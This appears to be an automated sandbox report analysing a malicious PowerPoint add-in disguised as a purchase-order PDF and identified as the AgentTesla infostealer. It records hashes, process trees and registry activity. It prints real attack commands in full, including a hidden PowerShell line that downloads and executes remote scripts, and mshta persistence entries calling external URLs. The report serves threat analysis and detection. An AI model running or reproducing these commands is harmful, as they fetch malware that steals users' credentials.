Analysis
-
max time kernel
114s -
max time network
149s -
platform
windows10_x64 -
resource
win10-en-20210920 -
submitted
20-10-2021 06:38
Static task
static1
Behavioral task
behavioral1
Sample
PO-20102021,pdf.ppam
Resource
win7-en-20211014
Behavioral task
behavioral2
Sample
PO-20102021,pdf.ppam
Resource
win10-en-20210920
General
-
Target
PO-20102021,pdf.ppam
-
Size
8KB
-
MD5
3471cb088d588150df6e37e2200afbf9
-
SHA1
90d89c9f5aaaae4c067f179651066303bc83f452
-
SHA256
66a3e3be3b63626de046621d447103e0978f5b24d3de0f412230ed6c2bfd6e28
-
SHA512
f01dc429d369a8502320775bf7b8fd7d56e8790ef2b91bfeea0b65fa5abf69f57a13f05493ccedb6606152682307f748b88879bc4afbe304c1e04a83cb017fb6
Malware Config
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
mshta.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process 2596 3144 mshta.exe POWERPNT.EXE -
AgentTesla Payload 2 IoCs
Processes:
resource yara_rule behavioral2/memory/2900-324-0x00000000004376CE-mapping.dmp family_agenttesla behavioral2/memory/1472-391-0x00000000004376CE-mapping.dmp family_agenttesla -
Blocklisted process makes network request 10 IoCs
Processes:
mshta.exepowershell.exeflow pid process 28 2596 mshta.exe 29 2596 mshta.exe 31 2596 mshta.exe 34 2596 mshta.exe 36 2596 mshta.exe 38 2596 mshta.exe 40 2596 mshta.exe 45 2596 mshta.exe 51 2596 mshta.exe 56 888 powershell.exe -
Drops file in Drivers directory 2 IoCs
Processes:
jsc.exeRegAsm.exedescription ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts jsc.exe File opened for modification C:\Windows\system32\drivers\etc\hosts RegAsm.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 6 IoCs
Processes:
jsc.exeRegAsm.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 jsc.exe Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegAsm.exe Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegAsm.exe Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegAsm.exe Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 jsc.exe Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 jsc.exe -
Adds Run key to start application 2 TTPs 5 IoCs
Processes:
mshta.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run mshta.exe Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\SAFEsounkkkd = "\"MsHta\"\"http://1230948%[email protected]/p/6.html\"" mshta.exe Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\Milalaasdasdlalal = "\"MsHta\"\"http://1230948%[email protected]/p/6.html\"" mshta.exe Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\Cleanreasdasdddsults = "\"MsHta\"\"http://1230948%[email protected]/p/6.html\"" mshta.exe Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\takeCare = "pOweRshell.exe -w h I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_67566eeb47104ffcb45eb2d55a0630a7.txt').GetResponse().GetResponseStream()).ReadToend());I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_80df20c857fc425bb4e96cfc21421a37.txt').GetResponse().GetResponseStream()).ReadToend());" mshta.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
powershell.exedescription pid process target process PID 888 set thread context of 2900 888 powershell.exe jsc.exe PID 888 set thread context of 1472 888 powershell.exe RegAsm.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
POWERPNT.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 POWERPNT.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz POWERPNT.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString POWERPNT.EXE -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
POWERPNT.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS POWERPNT.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily POWERPNT.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU POWERPNT.EXE -
Kills process with taskkill 2 IoCs
Processes:
taskkill.exetaskkill.exepid process 1140 taskkill.exe 740 taskkill.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
POWERPNT.EXEpid process 3144 POWERPNT.EXE -
Suspicious behavior: EnumeratesProcesses 11 IoCs
Processes:
dw20.exepowershell.exejsc.exeRegAsm.exepid process 316 dw20.exe 316 dw20.exe 888 powershell.exe 888 powershell.exe 888 powershell.exe 888 powershell.exe 888 powershell.exe 2900 jsc.exe 2900 jsc.exe 1472 RegAsm.exe 1472 RegAsm.exe -
Suspicious behavior: SetClipboardViewer 1 IoCs
Processes:
RegAsm.exepid process 1472 RegAsm.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
taskkill.exetaskkill.exepowershell.exejsc.exeRegAsm.exedescription pid process Token: SeDebugPrivilege 1140 taskkill.exe Token: SeDebugPrivilege 740 taskkill.exe Token: SeDebugPrivilege 888 powershell.exe Token: SeDebugPrivilege 2900 jsc.exe Token: SeDebugPrivilege 1472 RegAsm.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
POWERPNT.EXEpid process 3144 POWERPNT.EXE -
Suspicious use of SetWindowsHookEx 5 IoCs
Processes:
POWERPNT.EXEjsc.exeRegAsm.exepid process 3144 POWERPNT.EXE 3144 POWERPNT.EXE 3144 POWERPNT.EXE 2900 jsc.exe 1472 RegAsm.exe -
Suspicious use of WriteProcessMemory 35 IoCs
Processes:
POWERPNT.EXEmshta.exepowershell.execsc.exedescription pid process target process PID 3144 wrote to memory of 2596 3144 POWERPNT.EXE mshta.exe PID 3144 wrote to memory of 2596 3144 POWERPNT.EXE mshta.exe PID 2596 wrote to memory of 1140 2596 mshta.exe taskkill.exe PID 2596 wrote to memory of 1140 2596 mshta.exe taskkill.exe PID 2596 wrote to memory of 740 2596 mshta.exe taskkill.exe PID 2596 wrote to memory of 740 2596 mshta.exe taskkill.exe PID 2596 wrote to memory of 1432 2596 mshta.exe schtasks.exe PID 2596 wrote to memory of 1432 2596 mshta.exe schtasks.exe PID 2596 wrote to memory of 888 2596 mshta.exe powershell.exe PID 2596 wrote to memory of 888 2596 mshta.exe powershell.exe PID 2596 wrote to memory of 316 2596 mshta.exe dw20.exe PID 2596 wrote to memory of 316 2596 mshta.exe dw20.exe PID 888 wrote to memory of 4060 888 powershell.exe jsc.exe PID 888 wrote to memory of 4060 888 powershell.exe jsc.exe PID 888 wrote to memory of 4060 888 powershell.exe jsc.exe PID 888 wrote to memory of 2900 888 powershell.exe jsc.exe PID 888 wrote to memory of 2900 888 powershell.exe jsc.exe PID 888 wrote to memory of 2900 888 powershell.exe jsc.exe PID 888 wrote to memory of 2900 888 powershell.exe jsc.exe PID 888 wrote to memory of 2900 888 powershell.exe jsc.exe PID 888 wrote to memory of 2900 888 powershell.exe jsc.exe PID 888 wrote to memory of 2900 888 powershell.exe jsc.exe PID 888 wrote to memory of 2900 888 powershell.exe jsc.exe PID 888 wrote to memory of 2780 888 powershell.exe csc.exe PID 888 wrote to memory of 2780 888 powershell.exe csc.exe PID 2780 wrote to memory of 2460 2780 csc.exe cvtres.exe PID 2780 wrote to memory of 2460 2780 csc.exe cvtres.exe PID 888 wrote to memory of 1472 888 powershell.exe RegAsm.exe PID 888 wrote to memory of 1472 888 powershell.exe RegAsm.exe PID 888 wrote to memory of 1472 888 powershell.exe RegAsm.exe PID 888 wrote to memory of 1472 888 powershell.exe RegAsm.exe PID 888 wrote to memory of 1472 888 powershell.exe RegAsm.exe PID 888 wrote to memory of 1472 888 powershell.exe RegAsm.exe PID 888 wrote to memory of 1472 888 powershell.exe RegAsm.exe PID 888 wrote to memory of 1472 888 powershell.exe RegAsm.exe -
outlook_office_path 1 IoCs
Processes:
RegAsm.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegAsm.exe -
outlook_win_path 1 IoCs
Processes:
RegAsm.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegAsm.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\PO-20102021,pdf.ppam" /ou ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" https://www.bitly.com/wdowdpowdrufhjwijjd2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /f /im winword.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /f /im Excel.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""Bluefibonashi"" /F /tr ""\""MsHtA""\""http://1230948%[email protected]/p/6.html\""3⤵
- Creates scheduled task(s)
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exedw20.exe -x -s 29643⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_67566eeb47104ffcb45eb2d55a0630a7.txt').GetResponse().GetResponseStream()).ReadToend());I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_80df20c857fc425bb4e96cfc21421a37.txt').GetResponse().GetResponseStream()).ReadToend());3⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"4⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"4⤵
- Drops file in Drivers directory
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\n3y0mgtx\n3y0mgtx.cmdline"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES340C.tmp" "c:\Users\Admin\AppData\Local\Temp\n3y0mgtx\CSCB5F0EA64DCDA48CBB28B3F9AB6B0C8A9.TMP"5⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
- Drops file in Drivers directory
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: SetClipboardViewer
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- outlook_office_path
- outlook_win_path
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\RES340C.tmpMD5
2caf3100fd09a5136a659a92ea1ffd47
SHA1de3a30532b02a678fd955983450115f8d2f85d84
SHA2567fd8935962e1beba6dd81fe4cc7fbf8cded1ebd8335f52677554bd8a47d0db03
SHA5126af2ad9a32222925665ffef58c161b48ccec9c6cde0bcb33c02fa6e908222d21bf84e7efd21876ddc5d5f87c6ddb4c5359faf353ff2ecedf58f7be24a3a01e6f
-
C:\Users\Admin\AppData\Local\Temp\n3y0mgtx\n3y0mgtx.dllMD5
fab23d12ab053e47245a70d4797d8be6
SHA15625f44448ed855064ed6095ea6b1e2e415416c7
SHA25658c6d8e784368a18261952c7ee3688f1587b6fe260e059ea9c6871076f630374
SHA5126b3fa660dc98762185e64b43e3c771bf389e9ce0385d8d5fc5bcc43d55cf44525f7879cc9ed282c1dc37854ce700f98bd776e32455f8ac917c8ab756ce8240ea
-
C:\Windows\system32\drivers\etc\hostsMD5
5b2d17233558878a82ee464d04f58b59
SHA147ebffcad0b4c358df0d6a06ef335cb6aab0ab20
SHA2565b036588bb4cad3de01dd04988af705da135d9f394755080cf9941444c09a542
SHA512d2aec9779eb8803514213a8e396b2f7c0b4a6f57de1ee84e9db0343ee5ff093e26bb70e0737a6681e21e88898ef5139969ff0b4b700cb6727979bd898fdbc85b
-
\??\c:\Users\Admin\AppData\Local\Temp\n3y0mgtx\CSCB5F0EA64DCDA48CBB28B3F9AB6B0C8A9.TMPMD5
39cfc0f99a9eb0ea5fca96ec5c828c4f
SHA1cce25468e348d6fd9691bed7d226cd3026eab587
SHA256db8aabeea3d53b2b368bb15bfa20babd64c6ec29f2f341a91beda2272837d71a
SHA5124c8e0711fb8b78c4b31778cfe98ab2073cdf35aabce2abc1a1b25f7ac4da072dc24e79ddab5b97d9ff3fbc86ca4b444d750e3880d8d758cff2c124363a3c6462
-
\??\c:\Users\Admin\AppData\Local\Temp\n3y0mgtx\n3y0mgtx.0.csMD5
e03b1e7ba7f1a53a7e10c0fd9049f437
SHA13bb851a42717eeb588eb7deadfcd04c571c15f41
SHA2563ca2d456cf2f8d781f2134e1481bd787a9cb6f4bcaa2131ebbe0d47a0eb36427
SHA512a098a8e2a60a75357ee202ed4bbe6b86fa7b2ebae30574791e0d13dcf3ee95b841a14b51553c23b95af32a29cc2265afc285b3b0442f0454ea730de4d647383f
-
\??\c:\Users\Admin\AppData\Local\Temp\n3y0mgtx\n3y0mgtx.cmdlineMD5
a1ee74197f66fb8b0bf19b6ce9e70e15
SHA1e856627f45317f8e7019dded90612ed9c1d76226
SHA2564f45ba3433e7d2a5df795781f7ae0529515a7d3b93a6d9adbf3737d8d1fbe376
SHA5127db16ff7f47dea65ab185df4a1044e869f7176f793e7a23ef862f57daf6fbb24b2a1661209b6016848d1fbebf13917c23fba4cad02f3588fdd09447bad81894e
-
memory/316-295-0x0000000000000000-mapping.dmp
-
memory/740-292-0x0000000000000000-mapping.dmp
-
memory/888-309-0x000001D7A1D53000-0x000001D7A1D55000-memory.dmpFilesize
8KB
-
memory/888-294-0x0000000000000000-mapping.dmp
-
memory/888-308-0x000001D7A1D50000-0x000001D7A1D52000-memory.dmpFilesize
8KB
-
memory/888-310-0x000001D7A1D56000-0x000001D7A1D58000-memory.dmpFilesize
8KB
-
memory/1140-291-0x0000000000000000-mapping.dmp
-
memory/1432-293-0x0000000000000000-mapping.dmp
-
memory/1472-408-0x00000000052C1000-0x00000000052C2000-memory.dmpFilesize
4KB
-
memory/1472-397-0x00000000052C0000-0x00000000052C1000-memory.dmpFilesize
4KB
-
memory/1472-391-0x00000000004376CE-mapping.dmp
-
memory/2460-385-0x0000000000000000-mapping.dmp
-
memory/2596-261-0x0000000000000000-mapping.dmp
-
memory/2780-382-0x0000000000000000-mapping.dmp
-
memory/2900-381-0x00000000055D0000-0x0000000005ACE000-memory.dmpFilesize
5.0MB
-
memory/2900-324-0x00000000004376CE-mapping.dmp
-
memory/2900-407-0x00000000055D0000-0x0000000005ACE000-memory.dmpFilesize
5.0MB
-
memory/3144-121-0x000001AD1A100000-0x000001AD1A102000-memory.dmpFilesize
8KB
-
memory/3144-120-0x000001AD1A100000-0x000001AD1A102000-memory.dmpFilesize
8KB
-
memory/3144-119-0x00007FFE82E80000-0x00007FFE82E90000-memory.dmpFilesize
64KB
-
memory/3144-118-0x00007FFE82E80000-0x00007FFE82E90000-memory.dmpFilesize
64KB
-
memory/3144-117-0x00007FFE82E80000-0x00007FFE82E90000-memory.dmpFilesize
64KB
-
memory/3144-115-0x00007FFE82E80000-0x00007FFE82E90000-memory.dmpFilesize
64KB
-
memory/3144-122-0x000001AD1A100000-0x000001AD1A102000-memory.dmpFilesize
8KB
-
memory/3144-116-0x00007FFE82E80000-0x00007FFE82E90000-memory.dmpFilesize
64KB
-
memory/3144-250-0x000001AD293F0000-0x000001AD293F4000-memory.dmpFilesize
16KB